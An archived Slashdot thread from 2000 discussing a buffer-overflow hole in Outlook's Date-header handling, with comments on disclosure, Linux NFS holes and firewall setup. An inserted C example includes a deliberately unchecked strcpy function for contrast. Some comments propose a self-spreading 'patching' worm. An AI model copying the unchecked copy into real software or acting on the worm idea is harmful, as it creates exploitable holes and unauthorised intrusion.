Slashdot Mirror


Report Of New Outlook Exploit

viktor_haag writes: "Report on MSNBC today of a new vulnerability that exploits a hole in (at least) Microsoft Outlook. The bad news is -- this time you don't even have to read the email; in fact, the exploit can take place before Outlook even places the email in your Inbox. Looks to involve overloading the message's Date header field. MS says they're going to release a security patch on July 19 to fix this hole." The irony is of course that we're so jaded by all these sad macro viruses that when something this serious hits, we shrug it off as 'Just another security hole,' but this one is massive.

314 comments

  1. I'm not jaded by xee · · Score: 1

    This really is "just another outlook security hole."



    --
    Oh shit! I forgot to click "Post Anonymously"...
  2. Re:Date? by Anonymous Coward · · Score: 2

    Dear:

    [ ] Clueless Newbie [x] Loser [ ] Troll
    [x] Signal 11 [ ] Pervert [ ] Geek
    [ ] Spammer [ ] Nerd [ ] Elvis
    [ ] Fed [x] Freak [ ] FascdotKilledMyPr
    [ ] AOLer/Euronetter/PIer/MSNetter
    [ ] Other: Unbearably self-righteous person

    You Are Being Flamed Because:

    [ ] You posted something unfunny that will inevitably be modded up as "+1 Funny"
    [x] You posted something unfunny that will inevitably be modded up as "+1 Funny" by you using another one of your accounts
    [ ] You started an off-topic thread
    [ ] You continued a long, stupid thread
    [ ] You posted a bitchy "Slashdot sucks!" message
    [ ] You said "me too" to something
    [x] You suck
    [x] You brag about things that never happened
    [x] You spend all day tapping the refresh button
    [x] You posted something totally uninteresting
    [ ] You posted sexist shit
    [x] You wish to avoid the "wrath of the trolls" by flaunting your "edgy" sense of humor
    [x] You masturbate to pictures of CmdrTaco's shoes
    [ ] You are the leader of a secret Natalie Portman human-sacrifice cult

    To Repent, You Must:

    [ ] Give up your AOL/Euronet/MSN/Planet Internet account
    [ ] Bust up your modem with a hammer and eat it
    [x] Jump into a vat of acid while holding your monitor
    [x] Actually post something relevant
    [ ] Read the f****** FAQ
    [x] Be Katz's love slave
    [x] Apologize to me

    In Closing, I'd Like to Say:

    [ ] Blow me
    [x] Bite me
    [x] Get a life
    [x] Never post again
    [x] I pity your parakeet
    [x] Go to hell
    [ ] I think your IQ must be 5, join the Marines
    [x] Take your s*** somewhere else
    [ ] Learn to post or f*** off
    [x] Do us all a favor and start linking to Illiad. He's funnier than you.
    [x] See how far your tongue will fit into the electric outlet
    [x] Go crying home to your mommy...wait, you still live at home. Nevermind.

  3. Microsofts control of the Media by prac_regex · · Score: 1

    I would have to say the scariest thing coming out of the article on MSNBC is the quote "MSNBC.com learned of the flaw June 11, but agreed not to publish the information until Microsoft had a chance to supply a fix."
    Which has some interesting implications, I think. For companies like Microsoft to be able to cover up important press releases is one thing, and for the security crowd I'm sure you've all heard the term "security by obscurity". It never works.
    This event makes me wonder what things a company like AOL, who owns too much (MONOPOLY), can cover up at will. If AOL had a security flaw I wonder how much press it would get. I have less faith in AOL software in terms of security than Microsoft's, but when was the last time there has been a public release of them doing anything wrong?
    The media sucks is my point.

  4. Re:Oops by Temporal · · Score: 1

    And I modded you up on the same error. Oh well, easily undone. :)


  5. Does Microsoft Guarantee Security? by ChaoticCoyote · · Score: 1

    I'm waiting for the first lawsuit (if there hasn't been one already) that takes Microsoft to task for being negligent in developing software with blatant security flaws. It's unlikely anyone can sue over bugs, but a failure to protect against malicious attackers might be actionable -- especially in the litigious US.

    Does Microsoft guarantee (or even imply) that Outlook (or Windows, for that matter) is secure?

    Do we, as software developers, want to work in a world where our software is subject to judicial review? I think not...

    1. Re:Does Microsoft Guarantee Security? by toriver · · Score: 1
      Does Microsoft guarantee (or even imply) that Outlook (or Windows, for that matter) is secure?

      No. Standard Windows EULA usually says the software is delivered as-is, and that Microsoft are not responsible for problems related to use of the software. For NT, there is also a clause that if you actually should be able to prove Microsoft are responsible, the maximum compensation is $5.

      Despite this, there are IS managers who choose Windows over Linux because they naïvely believe that since they paid money they are entitled to some sort of protection against mishaps.

    2. Re:Does Microsoft Guarantee Security? by Tpenta · · Score: 1
      I'm no big microsoft fan, but come on, anyone who actually "guarantees" a product as secure is asking for big trouble. Guaranteeing or even implying such is like waving a red rag at a bull. Someone will take it as a challenge.

      The best that anyone can do in this area is to take all possible precautions in development and address issues as they happen.

      The really sad thing about this is that a majority of people will not load the patch and as such be vulnerable. The Morris worm all over again... *sigh*

  6. Re:Bugtraq by Remote · · Score: 1

    At least with cars, they know that the oil needs to be changed every 5000 or so KM, and that when the tread on the tires is bare, those need to be replaced. People are still using IE 3.0! Users generally too lazy to upgrade software, even if there's a known security issue.

    Emphasis was mine. This is precisely the problem: I am 100% sure that no one of the other 12 computer users at my office have the faintest idea that there may be security problems related to e-mail clients. We use Lotus Notes (yuck!) here, so I don't mind educating people on this new hole (I've never heard of any LN exploit) and I still think this is a problem to be dealt with by the sysadmins, which I'm not. The point is that most people don't keep insecure versions because they are lazy, they just can't imagine they are at risk. They just trust MS. Now, if I could just figure out why...


  7. Alternatives? by NetJunkie · · Score: 2

    If this were almost any other app or company this wouldn't be front page news. How many other apps have buffer overflow exploits? Yes, Outlook has had its problems but look at other apps that have had them. How many problems were there with sendmail? The problems got fixed and it continues to be used today. Until someone comes out with a product to truly compete with OutLook people won't switch. What other LARGE enterprise mail systems are out there that offer the features of Exchange? Security people don't usually pick the mail system, management does. Management just can't pass up the calendaring and scheduling features of Exchange.

    Instead of constantly bashing OutLook someone should actually go write a competing client. I'm currently using Mozilla's IMAP client. So far it's the most full featured by far. Sadly, it crashes about 3 times per day and on restart it sometimes won't create new messages. I can't wait for Evolution, but how long will that be?

    I'd like to see all the "MS SUCKS!!!" people in here sit down and write an app that does everything OutLook can do. Yes, it has its problems but you can patch it, just like everything else. Until there is another alternative, even a close one, people won't switch.

    1. Re:Alternatives? by Tsujigiri · · Score: 1
      Until there is another alternative, even a close one, people won't switch.

      What about Lotus Notes/Domino???

      --

      "I'll take the red pill. No! Blue! AAAaaaahhhhhhhhh"
      - Monty Python meets the Matrix

    2. Re:Alternatives? by Lordfeff · · Score: 1

      This is in response to everyone's comment concerning this thread.

      You can't compare applications unless you put them in a context. You need requirements (ack - I almost vomited while typing that part in). Outlook has the advantage of being intuitive for Microsoft users. Other apps work for other people. Do you think that the app for you has no flaws/holes? I bet there's someone out there who will disagree...

      I agree with the original statement that this wouldn't have been as big a deal if it were any other company's product. But the flip side is that Microsoft shot themselves in the foot. If they didn't shove all of their crap down everyone's throat, then the number of Outlook users would be smaller and it wouldn't be as big a deal.

      As far as MS SUCKS people writing an app to compete with Outlook goes, I bet that it could be done. The reason why it hasn't -- most people who hate microsoft don't like to develop features on top of a shoddy core. Most anti-microsoft developers spend time working out their bugs before releasing it. Also, I personally HATE gui development -- it's so BORING (to me. no offense to those of you who like it). I would rather have a nice text interface for my mail client (like Pine).

      If you want the ideal solution, burn it all down and start over.

      --
      We're all a bunch of glorified monkeys.
  8. Re:Wow..... by TrentC · · Score: 1

    Putting aside all the jokes and the "evil empire" comments and everything that the /. community feels about Microsoft, don't you think that a company of that size (and with their software controlling so many critical sites around the globe) has a responsibility to go overboard on quality assurance?

    That's one of the hallmarks of being a monopoly; if you have no competition, there's not as much reason to improve your product (except maybe to add nifty vendor lock-in features).

  9. Actually this is not the first by tilly · · Score: 2

    The earliest that I know of happened before you probably ever heard of the Internet. Go look up the Morris Worm.

    And I am sure that was not the first, I heard of it because it was the last time that an individual accidentally took down the Internet.

    Regards,
    Ben

    --
    My usual seat in the cluetrain is at A HREF="http://pub4.ezboard.com/biwethey.ht
  10. Re:THE EXPLOIT IS HERE! by xianzombie · · Score: 1

    great, but what does it actually do?

    forgive me for not being a coding type o' guy....

  11. Re:This one's better by fluffhead · · Score: 2

    I myself have been wondering ever since Win2k came out with this "feature" how exactly M$ was going to issue system patches & upgrades. Can't their installer just overwrite the protected files and update whatever registry entries (or whatever) control this feature? Don't know since I haven't played with Win2k as yet....

    #include "disclaim.h"
    "All the best people in life seem to like LINUX." - Steve Wozniak

  12. Re:Bugtraq by wafath · · Score: 2

    > Anyway, I think that the problem is people actually getting/using the patch.

    There is a very simple, and elegant solution. Write a program that exploits the security flaw that patches the affected system, and then replicates itself. To be careful it should have a self termination date, and maybe even maintain a list of addresses on a central server that it has been sent to, etc.

    Of course there are complications to this, first and most importantly that it is probably illegal. Therefore the above thought is provided for humor and irony purposes, and not an attempt to encourage anyone to break the law.

    Oh, and IANAL.

    W

  13. Buffer overruns: what's vulnerable? by Segfault+11 · · Score: 1

    I'm really just a novice programmer, and I'm fairly rusty since my high school days learning BASIC (Pascal would have been much nicer). I understand the basic concept of buffer overruns, and I'm well aware of it being a common exploit.

    What I'd like to know is this: are programs written in any language vulnerable to an overrun? If not, is buffer checking something that is only/mostly necessary with C and C++, or is it highly dependent on the compiler/interpreter?

    --

    I registered my hate for Jon Katz

    1. Re:Buffer overruns: what's vulnerable? by Spasemunki · · Score: 2
      As I understand it, any language with unchecked array bounds is subject to buffer overflow problems. Java, for instance, can't have buffer overflow problems; if I declare an int buffer[4] and try to write into memory location buffer[5], an exception is thrown. In C, however, writing into location buffer[5] simply means that I write into memory adjacent to the end of the array.

      (Nitpickers: yeah, I know, buffer[3] is really the last allocated space, meaning that the starting address of buffer[5] is actually 4 * sizeof(int) from the start of the array, and not adjacent to the end of the buffer. Children should be taught to count starting at zero.)

      So, it is a vulnerability specific to languages that don't check bounds on arrays. However, it is just as much the fault of the programmer. If you don't validate input, you shouldn't be surprised when things don't go as planned. In a Java program that wasn't given special bounds checking, the program would die on the exception, better than providing an exploit, but bad form nonetheless.

      "Sweet creeping zombie Jesus!"

  14. This one's better by mrogers · · Score: 2
    From the Microsoft security bulletin:

    Why doesn't IE 5.5 eliminate the vulnerability for Windows 2000 users?

    IE 5.5 cannot replace the affected component because of the System File Protection feature in Windows 2000.

    Nice "feature", guys.

    $ cat < /dev/mouse

    1. Re:This one's better by Evangelion · · Score: 1


      This is the man p... err, help document for the utility used to alter the behaviour of System File Protection.

      What I would guess, is that when you install software as Administrator, in which case the installer would run this after the software was installed - so that the definitions of Protected Files in the database gets updated, and the new versions cached. You wouldn't be able to do this as a normal user... I guess, anyway. I don't see how this would affect IE fixing Outlook's bug.

      It's not an answer, but it should shed some light on the matter.

      Now I'll sit here and wait for MS's lawyers to come at /. for copyright infringement. =)

      System File Checker

      System File Checker (sfc.exe) is a command line utility that scans and verifies the versions of all protected system files after you restart your computer. If System File Checker discovers that a protected file has been overwritten, it retrieves the correct version of the file from the %systemroot%\system32\dllcache folder, and then replaces the incorrect file.

      Syntax:

      sfc [/scannow] [/scanonce] [/scanboot] [/cancel] [/quiet] [/enable] [/purgecache] [/cachesize=x]

      Parameters:

      /scannow


      Scans all protected system files immediately.

      /scanonce

      Scans all protected system files once.

      /scanboot

      Scans all protected system files every time the computer is restarted.

      /cancel

      Cancels all pending scans of protected system files.

      /quiet

      Replaces all incorrect file versions without prompting the user.

      /enable

      Returns Windows File Protection to default operation, prompting the user to restore protected system files when files with incorrect versions are detected.

      /purgecache

      Purges the Windows File Protection file cache and scans all protected system files immediately.

      /cachesize=x

      Sets the size, in MB, of the Windows File Protection file cache.

      Notes

      You must be logged on as an administrator or as a member of the Administrators group to run System File Checker.

      If the %systemroot%\system32\dllcache folder becomes corrupt or unusable, use Sfc /scannow, Sfc /scanonce, or Sfc /scanboot to repair the contents of the Dllcache directory.

  15. In addition... by ChiaBen · · Score: 1

    IMHO the people using *nix are (in general) more informed and cautious about the 'features' in their software than your average Windows user.

    regards.

    --
    "If voting could really change things, it would be illegal. " - Revolution Books, NY
  16. Non-Report of New Linux NFS Remote Root Exploit by The+Pim · · Score: 5

    Posted never by no-one
    from the not-all-that-surprising dept.
    Yes, remote root on recent versions of (probably) all Linux-based systems that include NFS. Fortunately, most of them seem to have issued updates already. See the Security Focus Record for a summary (and, yes, an exploit). The irony is of course that we pretend to be concerned with security, but we really care only for ridiculing Microsoft, so when something this serious hits Linux, we don't even report it.

    --

    The evaluation of an action as 'practical' . . . depends on what it is that one wishes to practice.
    1. Re:Non-Report of New Linux NFS Remote Root Exploit by mwalker · · Score: 3

      Moderation Totals:Troll=2, Insightful=1, Interesting=2, Informative=1, Total=6.

      Those are the moderation totals on the parent (this) post, as of 7:26pm 7/19/2000.

      Before you dismiss this as off-topic, read on.

      How is it that 3 people think that this is an interesting or informative post, and 2 people think that he is Trolling, i.e., intentionally trying to disrupt an intelligent conversation?

      If something is thought-provoking, it is insightful, even if you disagree with it. If something is a deliberate attempt to disrupt a conversation, it's a Troll.

      Now, to get on-topic:
      Yes, remote root on recent versions of (probably) all Linux-based systems that include NFS. Fortunately, most of them seem to have issued updates already. See the Security Focus Record for a summary (and, yes, an exploit).

      It's on-topic. It's thought provoking, and it's informative. He hunted down a link for you. It's a massive security hole, just as big as the one in Outlook. Yes, you may disagree with his opinions or conclusions (I sure as hell do - no one is being paid billions of dollars to quality control Linux, it's the difference between a flaw in a gift and a flaw in an expensive PRODUCT) but that doesn't mean he's trying to disrupt the conversation. This comment is an insightful reality check. If his link was bogus, or his information was incorrect, Troll him. But if his facts are VALID and you disagree with his OPINION, mod him UP so we can all think about it and decide.

      Moderation is not about suppressing opinions with basis in fact, it's about suppressing l33t hax0rz who want some Natalie.

      Calling this guy a troll makes us look bad. Mod him up, and take his argument apart.

    2. Re:Non-Report of New Linux NFS Remote Root Exploit by Tarnar · · Score: 2

      Tone and delivery are just as important to delivering an argument as the facts and basis of the argument. Never forget that.

      A rabid Linux zealot that runs into a convention of MCSE's and starts slamming everything and everyone around him won't be treated nicely, even if every argument he uses is based in fact.

      That said, the post to which you refer was just that. His post was inflammatory and arrogant. Troll, perhaps not. But worthy of the 4 positive moderations it was awarded? I think not.

      On another note, I'd say an NFS vulnerability isn't as major as this Outlook one is, not by a longshot. And I can name dozens of Linux security exploits that have come out recently. They don't get this sort of press because of facts like 'MS has been sitting on this exploit since mid-June' and 'MS still has not released fixes for its flagship product, Win2k.' And at least with the NFS vulnerability, you can choose to turn off your NFS server. Telling people they can't check their email is a lot less of an option.

    3. Re:Non-Report of New Linux NFS Remote Root Exploit by VB · · Score: 1
      I agree with the following response to this. We should be unreligious and objective when engaging in M$/Linux discourse. My use of the all-too-familiar acronym for the Redmond Corporation may color me a hypocrite, but, the undertones of its usage speak very accurately to its use. Plus: less typing and everyone knows to whom I refer.

      There is an out-of-the-box feature in Linux that has existed longer than I can recall in its various forms. Currently, it's a simple matter of following these simple precautions:
      1. In /etc/rc.d/rc.M {if running Slackware} add the following:
           if [ -x /etc/rc.d/rc.firewall ]; then
             . /etc/rc.d/rc.firewall
           fi
         Have the following file named /etc/rc.d/rc.firewall that includes:
           /sbin/modprobe ip_masq_portfw
           /sbin/modprobe ip_masq_ftp
           /sbin/modprobe ip_masq_raudio
           /sbin/modprobe ip_masq_irc
           echo 1 > /proc/sys/net/ipv4/ip_forward
           /sbin/ipchains -F
           /sbin/ipchains -A input -s 0.0.0.0/0 -d 0.0.0.0/0 -j DENY -l
         At this point you are secure...
         If you're not running a server, do nothing further.


      2. Do not run your system as root;
      3. Do not install binary packages unless their source can be authenticated;

      You can now read mail, edit documents, send mail, and surf the web securely. No programs that come in, even JavaScripts will be able to trash your system, or even erase files in your user directory. If you're even more paranoid, don't surf the web as your normal user account. Create one for this express purpose.

      If you need to do Word and Excel documents, get StarOffice 5.2. If you think the 90MBytes memory hit is expensive, add 64 MBytes to the 64 MBytes you need already to run Win98 with Office97/2000. It's less expensive to buy 60 bucks worth of memory than it is to buy anti-virus software that slows down your machine and takes hours of maintenance every month, plus the additional money it costs to put in ZoneAlarm, or some other firewall. The vendor should lock down their stupid OS and all its little macro crap, period. If you need dancing pigs; then use Windoze. Consider yourself the ultimate risk-taker.

      The poster should have posted facts; not inflammatory remarks. Since I feel I'm headed in a similar direction, I'll post my 2 cents.


      Linux rocks!!! www.dedserius.com
      --
      www.dedserius.com
      VB != VisualBasic
    4. Re:Non-Report of New Linux NFS Remote Root Exploit by The+Pim · · Score: 1
      Both bugs are serious, but the Linux exploit only affects servers.


      No--this is a critical misunderstanding! rpc.statd is run by NFS client machines. And probably (this is a guess) running by default on machines with NFS client support installed.

      --

      The evaluation of an action as 'practical' . . . depends on what it is that one wishes to practice.
    5. Re:Non-Report of New Linux NFS Remote Root Exploit by The+Pim · · Score: 1
      NFS is nearly always firewalled.

      And mail is nearly always filtered at the MTA.

      As pleasant as it is to suppose that good security practices are followed, I guarantee there are scads of home Linux boxes with rpc.statd running and no firewall.

      --

      The evaluation of an action as 'practical' . . . depends on what it is that one wishes to practice.
    6. Re:Non-Report of New Linux NFS Remote Root Exploit by The+Pim · · Score: 1
      Heck, I'll analyze my post. I had read about both the nfs exploit and the outlook exploit on Bugtraq (and maybe elsewhere) before the Slashdot article. I thought both were stunningly serious, and that it was incredibly ironic, even perversely pleasing, that major holes in linux and microsoft were found one upon the other.


      Then I read Taco's post. He pointed out one irony, to be sure, but I was bowled over by the meta-irony that he overlooked the overwhelmingly greater irony--that Slashdot had failed to cover a similarly embarrassing linux exploit.


      So, I couldn't resist the urge to parody his article. I tend to agree that the Microsoft bug is the more damaging, but both are of sufficient magnitude that both parties should take a good hard look in the mirror.


      PS. I don't think I've ever had a post moderated four ways :-)

      --

      The evaluation of an action as 'practical' . . . depends on what it is that one wishes to practice.
  17. Blind leading the blind by Anonymous Coward · · Score: 1

    Since apparently nobody here has actually bothered to find out the truth about this bug and since everyone is eager to display his ignorance through blind Microsoft bashing, let me point out that this only affects Outlook IMO and Outlook CW with the Internet Email service added, and only if you have a version of Internet Explorer before 5.01 SP1. Which means most people (including everyone where I work and run the network) are not affected by this problem. And, everyone can have the problem fixed with a quick trip to the Windows Update site. I have verified this because I have a copy of the exploit and have tested it against several systems here. How many of you Microsoft bashers can truthfully say that?

    Score: -1 for spoiling the fun, -1 for not bashing Microsoft, -1 for actually doing research to back up my claims

  18. Funny thing, MSNBC reporting on MS. Check this. by TheLocustNMI · · Score: 1
    This article, brought to my attention by NerdPerfect yesterday states that SANS found the hole on June 27, but agreed with Microsoft to not release the information until Microsoft posted a workaround on July 14.

    Well, I bet someone is happy this didn't get out in the wild before then, eh?


    Ham on rye, hold the mayo please.

  19. You could have read about this on eWaddle first. by codeguy007 · · Score: 1

    Well, just thought you should know that eWaddle had this story up first.

    Check out eWaddle and Read, Register and post. BTW we don't turn down 98% of Stories.

  20. Re:Wow..... by Masem · · Score: 2
    It seems like 90% of all recent (within last 3 years) exploits that are not related to the activeX/scripting model are due to buffer overloads. Using C as the example, even if you specify the length of a char*, you can easily go past that with bad buffer copy mechanisms - even sprintf, I believe, can overflow a buffer. The large number of buffer exploits of late probably came initially from a few small but notable cases, but then suddenly anything with variable string input or arguments could become a problem, rising to the number of buffer exploits we see today.

    Not checking inputs before the buffer is copied into is a bad programming flaw, but only recently realized as being potentially hazardous. Thus, take all programmers that were in the workforce in 1990, and they would probably have missed adding the buffer checks, but now with buffer overflows a problem nearly every day, programmers in 2000 are much more conscious about it, but there is still legacy code that probably does this buried in code. Especially when the field itself is not thought of in a textual sense (a date field), these things tend to get overlooked in the general design of the program. However, this should only reinforce the use of a lint-like system after various compiles in order to find potential buffer overflows. Languages like C++ and Java provide some protection here assuming you use the typed Strings, but you can still create a buffer overflow without thinking about it.

    --
    "Pinky, you've left the lens cap of your mind on again." - P&TB
    "I can see my house from here!" - ST:
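Added example, not part of any comment in this thread and not Microsoft's code: the unchecked copy that Spasemunki's and Masem's comments describe, next to a bounded parser for a Date header and an snprintf call whose return value is checked. The 64-byte buffer, the function names and the sample messages are assumptions made for illustration, and folded (multi-line) headers are not handled.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define DATE_BUF_LEN 64 /* assumed size, chosen for illustration */

enum hdr_status { HDR_OK = 0, HDR_MISSING = -1, HDR_TOO_LONG = -2, HDR_BAD_CHAR = -3 };

char demo_out[DATE_BUF_LEN]; /* scratch buffer used by main() */

/* Constructed sample message, not taken from any real mail. */
const char SAMPLE_OK[] =
    "From: a@example.com\r\n"
    "DATE: Wed, 19 Jul 2000 12:00:00 -0400\r\n"
    "Subject: hi\r\n\r\nbody\r\n";

/* The unchecked pattern: strcpy() writes strlen(value) + 1 bytes no
 * matter how small dst is. Kept for contrast; never called below. */
void copy_date_unchecked(char *dst, const char *value)
{
    strcpy(dst, value);
}

/* ASCII case-insensitive prefix test, so "date:" and "DATE:" both match. */
static int has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix != '\0'; s++, prefix++) {
        char a = *s, b = *prefix;
        if (a >= 'A' && a <= 'Z') a = (char)(a - 'A' + 'a');
        if (b >= 'A' && b <= 'Z') b = (char)(b - 'A' + 'a');
        if (a != b) return 0; /* also stops at the end of s */
    }
    return 1;
}

/* Copy the Date header value into dst (dst_len bytes including the NUL).
 * Overlong or non-printable values are rejected, never truncated.
 * Scanning stops at the blank line that ends the header block. */
int extract_date_header(const char *headers, char *dst, size_t dst_len)
{
    const char *line = headers;

    if (dst_len == 0) return HDR_TOO_LONG;
    dst[0] = '\0';

    while (*line != '\0' && *line != '\r' && *line != '\n') {
        const char *eol = line + strcspn(line, "\r\n");

        if (has_prefix_ci(line, "date:")) {
            const char *val = line + 5;
            size_t len, i;

            while (val < eol && (*val == ' ' || *val == '\t')) val++;
            len = (size_t)(eol - val);
            if (len >= dst_len) return HDR_TOO_LONG; /* length check before any write */
            for (i = 0; i < len; i++) {
                unsigned char c = (unsigned char)val[i];
                if (c < 0x20 || c > 0x7e) return HDR_BAD_CHAR;
            }
            memcpy(dst, val, len);
            dst[len] = '\0';
            return HDR_OK;
        }
        line = eol; /* step over CRLF or a bare LF */
        if (*line == '\r') line++;
        if (*line == '\n') line++;
    }
    return HDR_MISSING;
}

/* Bounded replacement for sprintf(): snprintf() returns the length it
 * wanted to write, so a result >= dst_len means the text did not fit. */
int format_date_log(char *dst, size_t dst_len, const char *date)
{
    int n = snprintf(dst, dst_len, "Date header: %s", date);
    if (n < 0 || (size_t)n >= dst_len) return HDR_TOO_LONG;
    return HDR_OK;
}

/* Constructed input: a Date value made of n filler characters. */
int status_for_date_length(size_t n)
{
    char msg[512], out[DATE_BUF_LEN];

    if (n > sizeof msg - 16) return HDR_TOO_LONG;
    memcpy(msg, "Date: ", 6);
    memset(msg + 6, 'A', n);
    memcpy(msg + 6 + n, "\r\n\r\n", 5); /* includes the terminating NUL */
    return extract_date_header(msg, out, sizeof out);
}

int main(void)
{
    int rc = extract_date_header(SAMPLE_OK, demo_out, sizeof demo_out);
    printf("sample message:   status %d, value \"%s\"\n", rc, demo_out);
    printf("63-byte value:    status %d\n", status_for_date_length(63));
    printf("64-byte value:    status %d\n", status_for_date_length(64));
    printf("400-byte value:   status %d\n", status_for_date_length(400));
    printf("8-byte log buf:   status %d\n", format_date_log(demo_out, 8, "Wed"));
    return 0;
}
```
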
  21. I'm very surprised by this! by BigBlockMopar · · Score: 2
    Hands up all who are surprised by this!

    I'm very surprised it took so long for this bug to be discovered!

    --
    Fire and Meat. Yummy.
    1. Re:I'm very surprised by this! by Dman33 · · Score: 2

      I'm very surprised it took so long for this bug to be discovered!

      Yep, the beauty of Closed Source...

  22. Outlook vulnerable? by elbane · · Score: 1

    Who would have guessed that more security holes would be found in Outlook? BTW, fp.

    --
    I used to want to be somebody but then I realized I wasn't somebody material. -- Anonymous Coward
    1. Re:Outlook vulnerable? by powerlord · · Score: 1

      One of the reasons I like reading the Wall Street Journal. Everyone has a bias, at least with them I know it's money.

      --
      This space for rent. All reasonable inquiries will be entertained at proprietors discretion.
    2. Re:Outlook vulnerable? by powerlord · · Score: 2
      I agree, and because of that I am especially wary when I saw this:

      "This is certainly a serious one," said Steve Lipner, manager of the Security Response Center at Microsoft. Lipner said the stand-alone Outlook patch might not be ready until Wednesday, but concerned Outlook users can protect themselves immediately by downloading and installing the newest version of Internet Explorer at Microsoft's download site. That software includes code that will stop the vulnerability.

      So the way to stop the virus is to load IE5.5? Why? Did they already know about the virus for a while and do nothing to tell anyone else (ie. release a patch for the existing users while developing the future release)? Sound like a malicious plan to force users to upgrade to a new version, as long as the bug wasn't uncovered too soon.

      --
      This space for rent. All reasonable inquiries will be entertained at proprietors discretion.
    3. Re:Outlook vulnerable? by GodSpiral · · Score: 1

      Actually that's complete BS.

      The only way to stop the virus is to not use outlook express.

      They are trying to make it sound less bad than it is by saying that default IE5.5 or 5.01sp installation is safe. That's cause the default installation doesn't install OE. The story even said something like most corporate networks with Outlook are safe, because they don't use pop3 or IMAP4, but I'm sure more than one does.

      Maybe my ISP went down today to fix this major crap.

    4. Re:Outlook vulnerable? by SoftwareJanitor · · Score: 2

      Propaganda fuels this website.

      So you are telling me that propaganda doesn't fuel pro-Microsoft sites or any other sites?

      The biases of Slashdot are well known, and not a secret. Other sites often try to claim non-biased reporting, but in reality, everyone has their biases.

    5. Re:Outlook vulnerable? by bigchris · · Score: 1
      Hello, we're talking about email here! How many features can you add to email? I believe that the only features that have really been of any use are as follows:
      1. colour highlighting (yeah, that's right, colour highlighting :) If only more email apps had this, it really is a very useful feature in Outlook!)
      2. filters
      3. actually sending and receiving mail properly (does Outlook do this properly?)

      That's it folks! That's all that is really needed. Of course now that RTF mail is now a fact of life (and I don't like it one little bit, btw) most mail clients really need to be able to display it.
    6. Re:Outlook vulnerable? by jackmama · · Score: 1

      The problem is caused by inetcomm.dll, which is replaced when IE 5.5 or IE 5 Service Pack 1 are installed. Whether this means they knew about the bug and quietly patched it, or it was simply changed as part of development, I don't know. Since the patch is now available, I don't think it can be attributed to a sneaky plan of forced upgrading.

    7. Re:Outlook vulnerable? by jafac · · Score: 1

      This is not propaganda. Microsoft is empirically bad.

      if it ain't broke, then fix it 'till it is!

      --

      These are my friends, See how they glisten. See this one shine, how he smiles in the light.
    8. Re:Outlook vulnerable? by skoda · · Score: 1

      On the same day that Apple announces a beyond-way-cool new computer design, news leaks out that a *killer* security flaw has been found in MS Outlook.

      Mere coincidence? You be the judge ;)

    9. Re:Outlook vulnerable? by davstok · · Score: 1

      >>I believe that the only features that have really been of any use are as follows:...<<

      Well, chacun a son thingy. How about file attachments (I'm always sending and receiving software as attachments). How about distribution lists? How about sorting, searching and archiving? And while maybe not essential, how about HTML emails and HTML editors (nice for Birthday greetings and suchlike)?

    10. Re:Outlook vulnerable? by davstok · · Score: 1

      >>So you are telling me that propaganda doesn't fuel pro-Microsoft sites or any other sites?

      Heavens, MS and propaganda?. MS people are calm logical thinkers who choose things on technical merit, completely untouched by emotional issues or political or religious conviction. Surely everyone knows that...

    11. Re:Outlook vulnerable? by bigchris · · Score: 1

      Oops, forgot file attachments. Sorry 'bout that (what was I thinking!)

      I still don't really agree with HTML emails!

    12. Re:Outlook vulnerable? by sylvester · · Score: 2

      Does this look like fucking securityfocus.com? Get a clue /. Why don't you report all of the other vulnerabilities in UNIX/Linux OSs?

      while it's obviously a troll, I'll respond.
      A quick search for security brings us:
      2.2.16 Kernel Released - Fixes Security Hole
      Open-Source != Security; PGP Provides Cautionary Tale
      Red Hat 'Piranha' Security Risk - And Fix
      FreeBSD implicated in HotMail security problems

      Looks like they do. Granted, there're more MS security holes posted. However, I would say that there are more MS security holes. The problem only arises when/if they are posting in a proportion (MS vs. Open Source) that is not close to the real proportion of significant problems.

    13. Re:Outlook vulnerable? by Malc · · Score: 2

      "However, I would say that there are more MS security holes"

      It seems to me that the biggest security risk would come from newly added features to a product. Perhaps MS add more new features to their products than people? They're not playing catch up like other people.

      Of course, some might say that it is just because MS are incompetent when it comes to security ;)

  23. Re:Wow..... by Kintanon · · Score: 1

    Well, considering that at the moment the easiest fix is to install ANOTHER piece of their software which happens to be a web browser (It's not part of the OS, you can remove it whenever you want, it won't break anything, WE PROMISE!) I think that this bug might just be a vendor lock-in feature.>:)

    Kintanon

    --
    Check out JoshJitsu.info for Brazilian Ji
  24. Re:Security certification needed? by jason_aw · · Score: 1

    > Microsoft ... would benefit

    Hehehehe. *ahem*. Sorry.

    You /really/ think that Microsoft are going to open up their code to an auditing organisation?

    You /really/ think that Microsoft are going to benefit when the auditing organisation takes one look and falls over laughing?

    I think you're confusing "benefits Microsoft" and "benefits consumers"... sometimes it seems those aren't just not the same thing, but actually mutually exclusive.

  25. This isn't new. by NetJunkie · · Score: 2

    This happens all the time. If you find a security bug you usually give the vendor/author a chance to fix it in a timely manner before announcing it to the world.

  26. "Outlook not so good" by Benwick · · Score: 1

    ...that's what the magic eightball told me, and I have sworn by it ever since. In fact Outlook is excrement and shouldn't be used by anyone... as long as people keep using it, all the security holes will be found and viruses/trojan-horses spread... Makes me glad I use Eudora. Heh heh heh. No "I love you" e-mails for me! {sniff}

    Will Microsoft prosper in the 21st century?
    "Don't count on it."

  27. MSNBC Hijinx by MrEd · · Score: 2
    Things that struck me as funny in this article:
    • The story interrupted half-way down for a link to "Microsoft Profits top Wall Street Forecasts"
    • Not once does the article suggest that the most comprehensive fix is not using Outlook... But wait, how are users supposed to switch email clients when Outlook 4, Outlook Express 4, Outlook 5, and Outlook Express 5 all use different proprietary binary formats?
    • USSR labs... Did they pick up that name around 1991 by any chance?

    Just as with any news source, there's going to be bias. It's just that most news sources don't have such obvious and entertaining bias as MSNBC.

    --

    Wah!

  28. Vulnerabilities==virii by 11223 · · Score: 3
    What was the last hole this big? The clipart SHS hole - exactly causing the life_stages joke worm. This time somebody clever will make another virus - and it will spread like wildfire, before it can even get patched!

    Our only hope is to make an antivirus email that uses the hole to install the patch and then forwards itself off.

    1. Re:Vulnerabilities==virii by afc · · Score: 1

      Excuse me Mr. Coward, but you seem to imply that the fact that a MUA is "text based" guarantees it is more secure. Inquiring minds want to know why is that so? Does "MUA is text-based" imply "MUA cannot execute attached content"?
      --

      --
      Information wants to be beer, or something like that.
  29. Interesting times by kressb · · Score: 1

    Well, let's see. Today we have:

    1) Star Office getting GPLed.
    2) Apple releasing many new cool products.
